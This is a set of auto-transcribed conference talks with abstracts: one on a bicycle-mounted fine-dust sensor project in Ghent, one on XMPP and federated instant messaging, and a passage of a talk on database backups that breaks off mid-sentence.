get sensible information if we get proper information and the GPS is ready and we're still moving we go into the collect state I can show you this but not here because I don't have GPS here but I show you because we also added some debugging commands so through the serial you can say GPS is ready even though it isn't we fake that we're moving we fake that we have GPS and then we can test going to all these states same for the we fee test if we are not moving and the buffer is not empty so we have data we will probably add some periods in here that from time to time we want to check if we fee because it's very again it's we don't we want to save the battery as much as possible we go into we fee test if we have a fix for the we fee we upload our information and then we go back and we go back to sleep so it's very easy and I wish I had this from the beginning the firmware design as I stated the most important thing was code readability because we want people to to help and to join the project and to be able to adapt it to their own needs it's a simple state machine with state transitions as we call them yeah we want to have the ice at ice square see bus scanning which may be possible it depends I don't know how the how unique the IDs are but that's the problem I but maybe for the sensors that we are at maybe it's possible we'll have to see and then even if the IDs are not unique if you know that there are multiple you can test you can test if it works and we're working through github so as I said everything is open source we also have in github individual test examples for individual drivers and libraries to test if our own usually we have wrapper libraries for sensors if they are working correctly to configure them or to stuff with them we also have a PCB design but the first PCB design we have to redo but it looks a bit like this you can find how does it called kai cut or key cuts so we have key cut drawings but we'll we have to do that so this is the current status before I arrived in the project they already did a lot of selecting sensors and also for the fine dust sensor there are a few of them and they have all been tested together with a calibrated device so I was not part of that but that also took a lot of time to find what was the best combination of all that and now we are here we're busy doing the second prototype using the GPS I square C we hope to finish this in the next few months to be honest we had hoped to finish the first prototype with everything working before the holidays but we didn't make it especially because of the GPS if we would have made the I square C GPS pins to work then it could have worked but it seems it's not that easy to do then there are lots of functionality every time we have a meeting and new people join the meeting they have the same or new IDs and it's very nice but it doesn't bring us to a working device so while this is very nice and if you have new IDs let me know because I'm going to make a list of them to shortcut every deviation of discussions we have but one of the things is that's also why we have this this accelerometer is that we can measure if we on a bike if we have lots of bumps and if lots of bikes have lots of bumps at the same place we can give this information to those bike organizations that discuss with the government that bikes roads should be better as I said we want to include more sensor data or sensor information although for some of these we already have a lot of a lot of devices in Ghent so some of the information is already available but may not be open we want to support outside and in-house stationary devices as I said we are living very close to the end of the highway there's lots of traffic jams before our house and so it would be nice to know exactly what to do should we open the front windows no I told my wife never open them except maybe it's specific in the weekends or we always use the back windows but having that data would probably also for the awareness create a lot of people thinking about what they should do or how they should handle auto calibration of devices I told you if we pass each other we could think of not calibrating the device itself because we only want to have the raw data from the device also because if that information is somehow not usable because the device is somehow broken we want to know we want to see that when we're trying to put everything together and make checks of the data quality there is the idea of if we have this data which is already properly manipulated to get real information out of that we want to be able to have an application that gives you that same information even though you don't need the sensors in your device that would be nice as well it would also be nice to know what times of the day or what days it's better and what days it's worse and stuff like that or what the influence of the weather is it would also be nice to be able to show that in real time for instance people that are waiting in their traffic jams causing the traffic jam that they see what the quality is or even have those devices inside of your car because inside of the car it's also not quite healthy and if they know that maybe if we all start to use the bike there's no problem anymore. Yeah well I'm not sure if it is because the fine dust I don't know if they can filter that out and the ultra fine dust is even worse and that's what we cannot measure with this equipment so it's even worse and if you know that well I have some slides if we have some time or there are some questions after the questions I have some slides about the different types of pollution and the sizes of each because smoke if your cigarette smoke is very very bad it's ultra fine dust in some cases so yeah. This is the project information if you're interested in maybe joining a residency because you have a nice ID this is the time-lapse information unfortunately well it's mostly Dutch but I think there's some translated stuff unfortunately the websites of the Adam project which is the website to the public that one is in Dutch the GitHub everything is in English but for the communication to the citizens it's unfortunately it's Dutch but we have Google translate I guess. If you're interested about air quality in general where you are living you can find that information I don't know what I should do let's do first questions and then I can show you some some information because when I said we're doing this in Ghent there is a good reason why we do it in Ghent. Ghent is one of the worst in Western Europe so that's why I think it makes sense to do this together with Antwerp which is the major the largest city in Flanders. There's also an interesting project from Switzerland which is actually predating everything that I found they have this very massive device with lots of sensors they're testing almost everything and they've been put on top of the trams for continuously I think there's still there's a second open sense project now where they're trying to improve what they are doing but this one is nice because it gets all the information for all the different pollution and you can see that if one is high usually the others are high as well so they go together depending on the source if it's cars or combustion then it's usually the same thing. So let me first ask if there are any questions and then maybe I can show you some more slides about specific information. It's good yeah whether an event loop would be better than well a sleep loop. I don't know to be honest I think for an event loop you have to I think it wouldn't be used more battery I don't know I don't know exactly how an event loop would work in this case. It's C++ but it's Arduino kind of C++ they do a lot of things in between so to make it easier for children or for grownups to. We are using that yeah and I'm not a very good C++ programmer I can do C but C++ for me was also something new but yeah. So apparently there is a university and it's custom. It has a project like this as well but you couldn't contact with them and it would be nice because it's EU funded it would be nice to share information. I'll look it up. Yeah so the question is specifically to the casing but also to other information what if the conditions change and obviously the information we gather is also based on that yes in this case speed or wind airflow or things like that especially if you have inside a house or stationary devices where you may not have enough airflow to get proper information right. Yes so that's why we want to get the raw data the speed and stuff like that we want to get that also centrally so that we can take that into account but we have to do more testing before we can make any conclusive statements out of that and I'm not a big data or even a statistical engineer that can that knows how this works but we do have people that have that have this background that also are part of invent environmental action groups that have this background and that can do this that are part of the environmental study groups inside of university so they are involved but they're not part of it yet because we don't have data yet at this moment we are not collecting anything so but yes this is something that we have to take into account definitely and for the casing itself we have to make sure that the temperature for instance is outside temperature and not inside temperature we have to make sure that the airflow is good enough in fact the design of the casing will do something and I forgot what the name was but there is this physics I'll have to add that to my presentation for the next time I have to ask my colleagues there is something where you have different denser well different size of the tube that will suck in air there is something in physics that that will cause this and this is what we're going to use as well so that because of I don't know the fact that there is an under pressure somewhere it sucks in air but I'll have to add that to the sorry that I and why would you do that congratulations it's the first time I hear this ID so I'm going to write it down it's interesting as well special for those action groups yeah that would be interesting to have as well yeah it depends it could but it depends on the on the dust from from yeah yeah I think the device cannot cannot see a secret smoke at this moment no it depends on the size of the particles and cigarette smokers I can show you let me show you if we could measure it yes so if you look here at the types of stuff we find in the air so particulate matter is somewhere here in between this so it's dust and I think you see oil smoke is inside of this because we are measuring 10 to 2 and a half is lower than 10 and lower than 2 and a half but I don't know what the what the smallest it depends on the on the light sensor I don't know what the smallest particle is that we can measure that's that's a problem that's something we have to we have to see for ourselves but tobacco smoke you see it's it's lower smoke as well so I think that I don't know I couldn't say we have to test fact is that when we were testing the the the sensor inside of time lap we also tested it with someone smoking and we could see that the smoking also has those particles that are larger so we could see that smoking did have an effect on the sensor but the the question is how much does it influence the smaller you go the deeper it goes into the lungs but also the smaller the particle is so it's it's but it does the smaller you go it the better the worse for for the lungs that's effect and it also goes into the blood then so if it's very small I don't know exactly which I read about it but I forgot what size actually but ultra fine dust actually goes into your blood as well so into your bloodstream so it doesn't stick into the lungs but it goes into your whole body yeah yeah that's first it that's a good question we have to we have to find out we have to find out by getting the first devices out and testing how well they they behave compared to calibrated devices yeah something we have to find out the reason why we chose bikes is because we we think it's better than runners for instance where you have a lot of more shocks and probably the device wears out quicker so we hope that bikes are better for that but also because bikes take a longer distance so we can we can measure more so I do we think bikes is a good idea but we will have to see how well the devices can hold up against shocks weather conditions and stuff like that it depends how well our case design will be yeah yeah definitely so in the winter there's a lot of heating from houses I have another slide with sources of pollution let me see if I can find that one yeah that's this one so what what influences pollution obviously industry cars but also indoor heating which which influences the outdoor pollution but if you're cooking candles or very very bad don't use candles in house it's it's I told my wife and we bought those let's divide but it's not the same feeling and but don't use candles in house ventilation in your house also makes a big difference if you're cooking you should open a window especially if in house the pollution is worse than outside but how do you know right also don't open your windows in the evening or during the night because then houses are being warmed you have the heating in your house which causes pollution as well so a lot of people I think traffic jams are solved no no pollution anymore we open the windows that's that's not the case unfortunately early in the morning is probably best but because then the dust settles the pollution fine dust pollution is also worse lower to the ground and up because it settles up obviously so something to take into consideration as well there are very nice studies about the influence on things in Antwerp and again I think I have to finish it but in Antwerp and again there were projects where they they distributed plants for specific period of time and then they did a study on the plants they use this ferromagnetic scientific way of measuring fine dust because fine dust often also has small iron or metal pieces in it and that was a way to see what the pollution was and those studies were very interesting as well because apparently if you if you live on a big road like I'm doing you get a lot of fine dust in front of your house but the street behind it is it depends on the air flow obviously but it's a lot less and that's why I said to open the back side the windows at the back of your house and not in front of your house but obviously if you have a ventilation if you have an old house like ours the ventilation probably screws up any house so there are also natural sources of pollution obviously which you cannot do anything against and cars electrical cars are the future no pollution anymore wrong because the big part of the of the pollution are the tires yeah and the electrical cars are more heavy so they have a lot more pollution from tires but it's better than combustion engines obviously but still you had a question yes well the heater we're not going to use because the heater is actually used to get air into it to have an air circulation and since we're moving we're using that and also with this physical with this tube sting that also sucks in air this we think this would help but it's true that to get statistical information out of the sensor we have to measure for 30 seconds or something so in 30 seconds you already have on a bike you can do a lot of meters so that's one of the concerns so the information we get we have to we have to yeah we have to we know where we are that's a good thing and we know where we where we were biking so we have an idea of what we have measured but it will not be a specific place it will be on a road but if we have enough bikes then this will all fade away and we get better results but your rights we don't have that information instantly yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah I'm going I'm definitely going to check but indeed a pump we cannot do we also consider doing something like that but it's it's it's too expensive it's it breaks more easy because it's mechanical and stuff like that so we really want to have something cheap and get awareness first so as I said it's not completely scientific it could be improved but the more data we have the better first how much time do I have it's over so so what did you what slides did you not see but this is additional slides these are the projects that existed the strawberry plants ivy plants there is a new with collection tubes which is more scientific even for I don't know how it's called and or two but what the pricing so the device the price of the device without bulk prices because with bulk prices we can probably make this less but at the moment that's 60 euros and you can see the big the big price consumers and then I also have but I put the slides on on the website if you're interested about air pollution at your location you can find that link and you can you can look it up but yeah as you can see we're living here not very good and it's Italy and Turkey is very bad but also Eastern Europe is also very bad so yeah yeah in general we lose nine months of our life or one year of our life due to air pollution but that's due to air pollution but that's an average of course so could be more if you're a smoker it could add up to years of your life if you're unlucky if you're lucky you can become 100 years
|
The aim of this project is to create a device that collects air pollution data (PM2.5 and PM10 fine dust) and is mounted on bicycles to crowdsource factual air pollution information in and around the city of Ghent, Belgium.
|
10.5446/32401 (DOI)
|
Welcome to the session after lunch. Daniel Gulch is going to talk to us or tell us some things about messaging and XMPP and the exciting world around it. A reminder, this is being recorded. So if you've got any problems, be advised. We are recording this. Lots of fun. Over to you, Daniel. Thank you. Welcome to my talk, settling the IM war, creating an open federated instant messaging protocol. Something about me. I'm Daniel Gulch. I'm primarily known right now for being the primary developer of the Android XMPP client conversations. This works just like a regular instant messaging protocol, but it relies on open federated standards. But this is not going to be an advertisement talk about conversations. So I'm just going to say this once. Check it out. It's an awesome client. Conversations.im. But only after my talk. I'm also a little bit involved in the broader XMPP community. I'm in recent context with other developers and regular meetings where the XMPP community meets up and discusses the changes. If you want to know more about me, I have a website called Gulch.de. But enough about me. Who here uses more than one instant messaging client? Okay. So more than three. Okay. Yeah, still a lot. Any of you using conversations already? Okay. So that's awesome. Well, there have always been a lot of competing instant messaging services. Like in the day, for example, we had ICQ, MSN, and a couple of more. However, in recent years, something changed. First of all, instant messaging became more and more important. Instead of turning on our computers once a day and quickly check our emails or see who is online on ICQ, we now are online 24-7. And instant messaging just became a very convenient form of communication. It's less obstructive than a telephone call, for example, but it still allows for a fairly natural way of communication. So the second thing that changed was that the number of available instant messengers exploded. We are now at a point where even trying to name all of them is a sheer impossible task. Well, that's not a problem, you might think, as long as everybody uses WhatsApp. But in fact, not everybody does. First of all, everybody uses WhatsApp, views, sort of European view on it. If you look at other parts of the world, the market share of WhatsApp is not as significant. And the significant sense of WhatsApp further diminishes if you start looking at what kind of instant messaging solutions you are using at work. At work, tools like Slack, HipChat, or even Skype become more important. However, at the end of the day, all those tools do pretty much the same thing. That's why there's huge demand for the so-called multi-protocol clients like Pigeon, for example, or Trillion, which is popular on Windows, or the latest one called France, which incorporates all those web clients in One UI. So this leaves us with the question on why isn't there a standard protocol for instant messaging that would make all those services interoperable? Well, actually, there is. Such a standard actually exists, and it has been for more than a decade. It's called XMPP, which is sort for extensible messaging present protocol. And I'm not going to go into too many technical details. The key thing to remember is that it's extensible. So at a very low level, you are just able to exchange messages between two devices, and at a higher level, you can build almost everything on top of it. The basic protocol is an IETF standard, and the extensions are formalized as so-called XSAPs by the XMPP Standards Foundation. Because of those extensions, XMPP can keep up with the changing requirements that naturally occur over time. I've already talked a lot about the specific extensions you need to build a full-fledged instant messaging solutions. For example, at my last year's talk at Frostconn called XMPP 2015 Challenges of Modern Instant Messaging. I more recently wrote an essay called the State of Mobile XMPP in 2016. So if you want to know more about the technical details, go check this out. This is a link from my website. Who has read my essay or been to last year's talk? OK, a lot of people. Yeah, the rest of you should definitely check this out if you are interested in the technical details and not like an end user. If you're an end user, you probably shouldn't care about all this. So I ended my last year's talk with a statement that with XMPP, you are now able to send an encrypted messages, which can also be an image, to someone who uses multiple devices. And some of those devices can also be offline. So this might not sound too revolutionary, but for example, the Facebook Messenger, which recently introduced enter-end encryption, still fails to do this. When you turn on enter-end encryption in the Facebook Messenger, you have to select one specific device. To get to that point, we had to introduce two new extensions. One was called HTTP upload, which shifted from the traditional method of file transfer using XMPP, which was peer-to-peer based, where you can only exchange methods from one specific device to another device to another method where you basically upload a file, an image for example, to the server, and then just distribute the link to the other devices of the contact. And the other extension we introduced are capable of encrypting to multiple devices. It's called Omimo. Last August at the time of my talk, the only client capable of Omimo was Conversations. And during the past year, the other extension we introduced HTTP upload has seen a pretty huge adoption rate. Several clients and servers have now native support for this. However, Omimo is in a slightly more complicated situation. The good news first, last December, we released a very basic plug-in for the desktop client Gadget, at which point the multiple device aspect of Omimo actually started to make sense. Unfortunately, Omimo suffers from one big problem. Due to its very nature of involving encryption and multiple devices and fingerprints and stuff like this, implementing can take up several days, if not weeks. And in a world where development is mostly done by volunteers, it makes a huge difference if something can be implemented in afternoon or if it's a week-long commitment. This was something like HTTP upload, which can easily be implemented in afternoon, gets adopted pretty quickly, especially because you immediately see the results. With Omimo, on the other hand, you would simply just spend days just preparing stuff and setting up the infrastructure before you are able to send a simple hello world, for example. And I'm fairly certain that the Omimo plug-in for Gadget only happened because we did the initial work ourselves. And I didn't mind putting in the work because I have a commercial interest in it, and I don't care if it's frustrating for a couple of days. And after that, actually, someone else took over because when you have the basis, then it's easier to just have incremental steps and fixing bugs or bugs doing UI improvements and so on. And the only other Omimo implementation on the horizon now is the one in chat secure, which is also not being developed by volunteers but by paid developers, thanks to finding from the US government. And if you look at the progress conversations that's made in the two years of existence, it becomes clear that there aren't any unsolvable technical problems, and you can easily build up on existing extensions or, if that's not possible, introduce your own. So it's not really about missing features. So what are problems might there be? So some say it's a fragmentation. It's an open standard, you always have clients only implementing just a minor subset. Give me a second. Well. I mean, it was an open standard. There's nothing stopping you from creating a very basic client that is barely capable of sending messages and call yourself an XMPP client. Such clients will always exist. And if they gain some popularity, they will, or there's a chance to put XMPP into a bad light. However, for the developers who are actually interested in creating a good state of the art client, the ACRO compliant suites that help a newcomer navigate the jungle of various extensions. So meta extensions like the XMPP compliance with 2016 point the developer to only a handful of extensions and basically say implement those and you're fine. So this is the client side. When we start talking about fragmentation on the server side, we have to make a distinction between the server implementations and the actual installations. The three major server implementations aren't actually that fragmented. They all share more or less the same feature set. But if you look at the actual installations that are out there, we get a different picture. We often see this problem with users stepping by our support channel and asking the question, why doesn't feature X work for me? And for a long time, the answer to that question is for a long time, the answer to that has always been, it's just your server that doesn't support it. Conversations is perfectly fine of handling this. This is just the fault of your server. But this is still a major issue because the end user really doesn't want to care if it's a server or the client. They just want it to work. So why doesn't those installations don't offer those features? Most servers are run by volunteers, and it's safe to assume that they are not willingly holding back those features. Most of the extensions don't put any more load or pressure on the server. And it's usually just a matter of enabling those extensions or simply not using the extremely outdated version from the debilary repository, for example. So how do we fix this problem? Well, we first have to make the problem visible. So a couple of months ago, I wrote a small tool that connects to your XMPP server and simply checks for the features. Originally, it was meant like some kind of self-assessment tool that you can run on your own server and checks if your own server, the server you operate, supports those extensions. But you can also gather more information from more servers and collect this information in some kind of list. So this is what I did. I created accounts on various servers and just did this overview of what extension is enabled on what server. And when you do this, you get a lot of missing features, which are marked in red on this diagram, on a lot of servers. So what do you do now? How do you fix this? How do you convince a server operator to enable those features? Well, what I did was try asking them. So I spent an afternoon to look up the contact information of a couple of bigger servers and just sent them an email and said, hey, XMPP evolved a lot in the past. And we now have those extensions that need to be enabled on the server. And your server actually supports this. You just have to enable it. And if you want to add a more convincing argument to them or to give the server operator some incentive to actually enable this, try gamification. If you order this graph by supported features and not alphabetically, then you get a nice little high score system and every server operator wants to be on top of some lists. And this is something where every one of you can actually help. You don't need to have any programming skills. Just go to this list, pick a server from very down there that doesn't support any of the extensions, and then send an email or mention them on Twitter or something and just ask them to enable those extensions. So what are the problems, Arzader? Well, another argument that is usually made against XMPP in particular or more generally is the problem that is usually made against XMPP in particular or more general to other standards or open protocols is that it slows down your development process. But this is actually not true. You don't have to wait for something to be a standard to implement it. You can implement something first and then try to standard the sizes afterwards. I mean, every half a decent programmer should write down what they're trying to do anyway and document it in some way. And if you modify that existing documentation, you are already halfway to an official extension. I mean, chances are that during the process of standardization, the protocol will evolve a little bit and be adopted so other people get their needs covered with this as well. But usually, they don't change in a way that makes it impossible to adopt your implementation. Well, and even if it's a little bit of extra trouble to standardize those extensions, it's still far better than implementing an entire IM protocol. And a lot of extensions actually came to be like this. Google, for example, originally introduced Jingle, the sectional utilization you need to do voice over IP calls or video calls. And this later evolved into the official standard, into the official Jingle extension. And the original Google Talk client also had an extension called Google Q, which limited the battery consumption the client generates when in background. This extension, with a few modifications on the syntax, later became client state indication. Unfortunately, this process can become annoying if you're waiting for someone else to publish an extension. The primary example for this is the mixed story. XMPP always had an extension for group chat called MOOC multi-user chat. And MOOC looks a bit like IRC and has a very extensive permission model with moderators, participants, visitors, and so on. And for some time now, the broader XMPP community agrees on the fact that MOOC isn't really suited for those private group chats on the style of WhatsApp or Hangouts and should be replaced with something else. In fact, last year, during the question section, we had a question section of my talk. I was asked about a Mimo and Group chat. And my response was that we have to wait for mix. And mix at that time was in very early planning stages. And without going into technical details, we still don't have a proper implementation. Well, there are a number of reasons for this. And the number one reason is that mix is just a very vast extension. It's set out to cover the use cases for the next decade, and a lot of people are trying to get their use cases covered. But the more frustrating reason to some people was that mix was primarily written down by one or two people from the same company. While the requirements and the features that MOOC's mix sort of have were discussed publicly and everyone could get their wishes in, basically, the actual writing happened behind closed doors. And any offer to help out or to speed up the process was rejected. So this left a lot of people who desperately needed a replacement for MOOC uncertain about if and when it was going to happen. As a result, we saw two different proposals for other group chat extensions that were basically variants of MOOC. However, it is rather unlikely that those extensions will ever become standard because everyone else is still waiting for mix. So what I did, I was also waiting for mix, so what I did is I actually re-read the MOOC standard again and came up with a solution to get my own OEMO group chat covered with this thing, MOOC. But yeah, let's say using MOOC in a way that no one else has before and stretching some of the definitions are in the standard. But it got to a point where it was actually usable with some limitations. For example, the primary limitation is that to engage in a group chat, you have to have everyone in your roster, in your personal contact list. But this still works fine. I mean, especially for those small group chats, you're usually just chatting with your friends and you have those individual contacts in your contact list anyway. So I'm now at a point where I can more patiently wait for mix to happen because I no longer have the pressure of actually needing a solution because I already have a workaround. And yes, of course, using mix will make a lot of things more easier and definitely more bulletproof. But it's fine for now. And so just last week, the people who wrote mix actually published a huge progress update to the standard. And we might actually now see first implementations of mix pretty soon. So if XMPP is such a fine protocol, why doesn't it get used more often? Well, I'm not the one who makes the decisions at Google or Facebook or WhatsApp, so I can merely speculate on the reasons. But some companies, for example, Google or OpenWhisper Systems at some point actually issued statements on why they're not using XMPP. However, those statements, as every statement made by a marketing department, of course, should be taken with a grain of salt. For example, our arguments from OpenWhisper Systems for not using XMPP are actually just incorrect. So what other reasons are there for a company not to use XMPP? But to answer that, let's take a step back first. And look at the companies who actually do use XMPP. While they might not actively advertise this, WhatsApp actually does use XMPP. Of course, over time, they introduced a couple of extensions. The most prominent extension of this being the compression layer that optimizes XMPP for the use of mobile devices, which was what they primarily tried to do. But they decided not to publish and synthesize the extensions. And before we going to speculate on the reasons on why WhatsApp doesn't do this, let's look at some other companies or organizations that actually do use XMPP. For example, NATO. NATO uses a lot of XMPP. And as one can imagine, government organizations and the army in general have some special requirements that are not already covered by existing extensions. So what did they do? Did they just think XMPP doesn't solve a problem? Let's invent something else? No, of course they didn't. They just came up with an extension. And this is why there's now an extension that labels individual messages with security clearances and stuff like this, because you do need this in a military environment. But this opens up the question on what's the difference between NATO and WhatsApp? Well, it's easy. It's their revenue model. NATO basically pays a company to develop an instant messaging solutions for them. And having the protocol sanitized can only be beneficial to them, because in theory, after the contract expires, they can hire someone else to keep on developing the instant messaging solution. So NATO, as a user, pays someone to develop something. In case of WhatsApp, the revenue model looks entirely different. The user doesn't pay for anything. WhatsApp is that relies on, I guess, inflating the investment bubble, and with the vague arguments that at some point when we get enough metadata, we can sell very, very targeted advertisement. But doing this, inflating the business bubble, relies on growth, on generating more users every day. And in a federated world where clients and servers are interchangeable, that's not possible. I, for example, I have no idea how many people are using conversations, because, of course, I do have the download numbers from the Google Play Store, but I don't have any download numbers from F-Blood, for example, or from the, admittedly, few people who built it themselves. Or I also don't account for all the forks of conversations that are out there. And by the way, if you're ever wondered why OpenWhisper Systems is so reluctant to have their signal app on F-Trade, well, there's one reason. Because when everybody uses Google Play, there's a better overview of how many users they do have. So if you wanted to change all that, we would have to start paying for the services or software directly. Well, remember when I said implementing a MIMO is boring and unmotivating work? And two of the implementations that are out there that are being developed are actually being worked on by our paid developers. What if he stopped relying on volunteers to develop our software for us, and instead paid someone to do it like we pay everyone else in our society? And you don't even need to have a large user base to make this work. Let's take conversations, for example, which, admittedly, is a rather small-owned source product compared to others. If everyone who uses conversations would have bought it on the Play Store for about $2, I would actually be able to make a decent living off of this. Or in other terms, even a fairly small user base, like the one from Conversations, would be able to pay for a full-time developer. And well, I guess if you are fine with a few large companies controlling our most important form of communication, we don't have to do anything. So we'll continue to act in the interest of the investors and the current mass of incompatible, instant messaging and solutions will continue as there are consequences of the business model. However, if you are unsatisfied with the current situation, you should stop relying on the work of a few volunteers and actually start paying for the software and services we use on a daily basis. Well, thank you. OK. There is now one more thing, actually. I announced this on Twitter a couple of days ago. And well, it's been a very interesting year since we introduced Omimo last August. We saw the Gajim Omimo plug-in came to life in December, which was an important step because it actually allowed us to enjoy the multi-end aspect of Omimo. And I released Omimo-encrypted group chats on top of MOOC that proved that MOOC is capable of handling entrant-encrypted group chats in March. And we also sorted out some licensing issues that stopped the chat secure developers from implementing Omimo for chat secure on iOS. And they are actually working on that now. And while I don't have an official ETA for Omimo and iOS, I'm fairly certain that it will happen this year. I mean, after all, chat secure on iOS has already made a huge progress this year and implemented push notifications, which finally allowed us to reliably receive messages on iOS, which was unfortunately impossible before. However, one important thing for Omimo is missing. And that's our independent security audit. Well, it was missing until now. And I'm very happy to announce that I can finally make this audit public. I've been sitting on this audit for a couple of months now, actually. And we had some things to sort out with a company who actually paid for this. And if you ever read a PEN test or an audit before, this is actually one of the better audits. It's actually pretty nice to read. And it's made by very competent people at a security company called Radically Open Security, which are based in the Netherlands. And it was paid for by a very nice company called the Pacific Research Alliance. And it covers both the protocol itself as well as the implementation in conversations. And to quickly reiterate on my earlier point, this audit only came to happen because someone had a commercial interest in conversations and needed this. This wasn't paid for by donations or certainly wasn't done by someone who volunteered to do it. So yeah, that's about it. Questions? We have a microphone, I guess. You said there were two main developers of Mix and that there were some people who, instead of waiting for Mix or instead of trying to get their own ideas in, instead, do you develop other protocols based on the current MOOC solution? And is there anything in the current Mix protocol that you think might be a problem, which might be because it's only produced by two developers from one company who might have vested interests in only implementing some of the ideas? Yeah. Now, like I said, Mix is the actual set itself, like the entire text it covers, is written down by two people. And it happened behind closed doors, so you didn't have an ETA for this. But the features in Mix were actually discussed in a public place with a lot of different XMPP users from various companies. So for example, there are so-called XMPP summits twice a year where there are larger XMPP community gathers and lots of conference. And we actually discussed Mix for like an entire day or something like this. OK, so you don't think there are any maybe bigger problems in Mix which are cool ideas which could have been included, which weren't included because the company which pays the two developers might not want that to be included. So you think it's a good and open process and that the Mix protocol itself is actually very good and- No, I don't think so. OK. And I mean, in any case, once it's public, you could in theory, of course, get your own changes if it were necessary. Of course, you couldn't always fork if you want. No, you wouldn't necessarily have to fork it. You just have to convince the rest of the XMPP standards foundation to accept your change. Thanks. OK, are there any other questions? OK, thank you. If you want, I do have stickers with me. If anyone wants some, just meet me up here. OK, thank you. Thank you very much. Thank you. Thank you.
|
The world of Instant Messaging is populated with hundreds of providers - all incompatible with each other though history has shown that walled gardens are not sustainable. Why are we unable to agree upon a standard to communicate with each other?
|
10.5446/32420 (DOI)
|
Ja, einen wunderschönen guten Morgen. Der Christian sagt mir hinterher mal irgendwie so 5 Minuten, 10 Minuten vorher mal einmal kurz Bescheid sagen, weil ich habe jetzt keinen Überblick mit der Zeit, weil mein Präsentamonus funktioniert jetzt auch nicht. Und hier fehlt die Überschrift, dass irgendeinem Grund habe ich da vorhin versehentlich wohl so. Auch super. Jetzt ist die Überschrift auch da. Sorry. Is somebody in this room who wants, who prefers English? Okay, then I will do it in English. So, we had a little bit problems with the technique. And you want to discuss database high availability. So, as usual my slides are only valid with the talk, not without the talk. So, who am I? Okay, so, okay. Yeah, my name is Susanne Holzgräfer. When you Google or just me for my name, it's very funny, you will find nothing, because I married last year or three years ago and changed my name. When you Google for my birth name, you will find 120 pages and more. Or my Nick is my IC, you will find also a lot. Today I am working as senior consultant, senior trainer for PostgreSQL, MariaDB, and of course MySQL. I am or was, from 2000 up to 2012 or 13, I was part of the PostgreSQL Developer Team. I developed PostgreSQL, so the mostly parser. And I worked for MySQL and there as developer and later as senior support trainer consultant and so on. So, I am one of the two persons in the world who have developing experience at the PostgreSQL project and at MySQL. I am active in database business, I guess at the beginning of 2000, 2001. I am in open source community since 1996. I started with Debian. And so, I made my diploma in computer sciences. I made PhD studies in the content was big data, geoinformatics, geo data measurements of the earth. Yeah, I am freelancer and also also speaker, I write hundreds of articles about PostgreSQL, MySQL, and so on. So, usually I am standard speaker. Oh, he said I should not go too far in the corner. So, we start with high availability. When you ask for higher availability, usually ask first for backup. So, what do you think? Why do you need a backup? Why do you need a restore? Okay, because serverfax. Any other ideas? Why do you need a backup? So, yeah. Table drops. Yeah, table drops. So, the Germans call it Wurstfingerfieler also. So, typical mistakes you make by accident. You wanted to reinstall another server, the test server, but install the production server also happens too. So, when you lose for the case that you lost your data. So, do you still need a backup when you have a rate system? Okay, so, I think that was clear. What do you need to backup? Do you need to backup your operating system? Or do you just need to backup your data? Do you need the classic questions? What do you need to backup? So, usually you don't need to backup the operating system, because I can easily download again and install again in newer version. So, and your database systems, you also not really need to backup the Post-Squarel or MySQL installation, because you easily can reinstall it. What do you need to backup other data? In databases you need to backup the data directory or the content of the data directory so, that you have all your own data and for restore. Hallo? So, how often do you need to backup? Every night, every week, every day, depends on the emergency or the importance of your data. So, when you can live with the fact that you will lose one day of data, then you might need backup for just one day. Hallo? How long, for how long, how long do you need to store your backup? Yeah. First, it depends on the law, because we have laws that you have to remove data. We have deletion laws and so, when you have a law that says you have to delete the data, then they should not be in any backup too. So, and when you have a backup from today and you make backup next week and then you make it weekly. In 2 weeks you have 3 backups and you test it if you can restore one of them, the latest one. You don't need the one from today because you have the other two. So, you can delete it or overwrite it. So, the question is how much backups and how many backups you need, and when will you reuse or delete them. Don't need them anymore. So, I often have this discussion, but the data is still in the backup, I said, no, because you make a backup every week. And when you delete your data and you will need it, even when you make it incremental backups, every night incremental backups. So, and I start today deleting some values and upcoming night there will be an incremental backup. So, my backup won't have them tomorrow, even it won't be in the backup anymore. So, I don't need to think about it, how long I need to, how to get this old data out of the backup. I don't need to store backups for years. I'm not sure in banking business if they really need to store backups 10 years or so, but usually you need to backup, you need to have 2 or 3 backups and then you can recycle the backup space. And it's a space question, when you have a huge database from 300, 400 GB, you don't want to have a backup from each night, full backup. So, in the database world we decide between logical and physical backup. And now I have to ask, who of you is using MariaDB? Okay, who of you is using PostgreSQL? Who of you is using anything else? Oracle? Oracle? Did you ever use MySQL or MariaDB of PostgreSQL? So, okay. I could ask, who don't know what's a dump? Okay, so, logical backup is a dump. There are advantages from dump. There are also disadvantages. So, let's look to the procedure of a dump. I'm still, it's okay to stand here, I don't want to stand in front of my slides. Hello. When you have, this is a timeline, let's say you make a dump here, for example at two o'clock in the night, your system do a dump. So, you have a dump file from last night to a clock, and somewhere during the business day you have a big crash, flash in the data center, all down, not even the emergency light will work anymore or so, or whatever else. So, you did this classical drop table in the wrong terminal, or whatever, so you have a crash here. So, and the crash should, where you decide that you need to restore backup. Then you can use this dump, and you will have, yeah, when you restore the dump, you will have all up to this point, but not the transaction who not finished. So, you will have this other transactions, I thought about four CPUs, so four processes who throw transactions to the database. And you see here, here's this transaction here, won't be in the dump, and also this transaction won't be in the dump, because usually the dump, the database systems are doing a snapshot, and just take all committed transactions from that time when the dump starts. So, you have this and that, but not the unfinished transaction. So, and then you have a big loss of activities. So all data you have had between your dump and your crash are gone. You don't have them, you can't restore them. So, now, that might be a full business day. I not said lost data, because I said lost activities, because all what you have done the whole day of your business is lost. So, it's also money, what is lost, for example. And it's also a lot of time, because you have to do it again. And yeah, and then after the recovery is done, you just have the status here. So, you have to redo all what you did. Maybe you don't need to redo it, then it wasn't important what you did the whole day, but usually you need to redo it. That's the disadvantage of dump. The advantage of dump is, that dump is plain, or is usually plain as a gral file, as a text file, and you can zip it. So, it's smaller in any case. It's way smaller than your data directory, when you have indexes on your tables. It's very simple. Of course, you have your data in your dump. So, all data in your tables, that space is similar. But, you don't have a copy of your indexes, because in the dump you will just find create index. So, you don't have any already stored data of your indexes, so the dump space, that you need is way less than your data directory. The disadvantage is, you need to rebuild all indexes, and that can need very, very long time. And especially a dump is using, on the open source database system, the dump is using a single process. You can use more processes, but each statement is a single process. So, create, you can't split, create index to more processes, to more CPUs. So, use one CPU per creation index creation. That's a little problem. So, your database will do lots of I.O. on recovery. And it might need very long, because you need to rebuild the indexes. The second is physical backup. Physical backup means, you have a physical backup of your data directory. So, you have a copy, you have some real copy of your data directory. It can be zipped, it can be whatever, but you have a real copy. So, create an article and the author and the editor had the 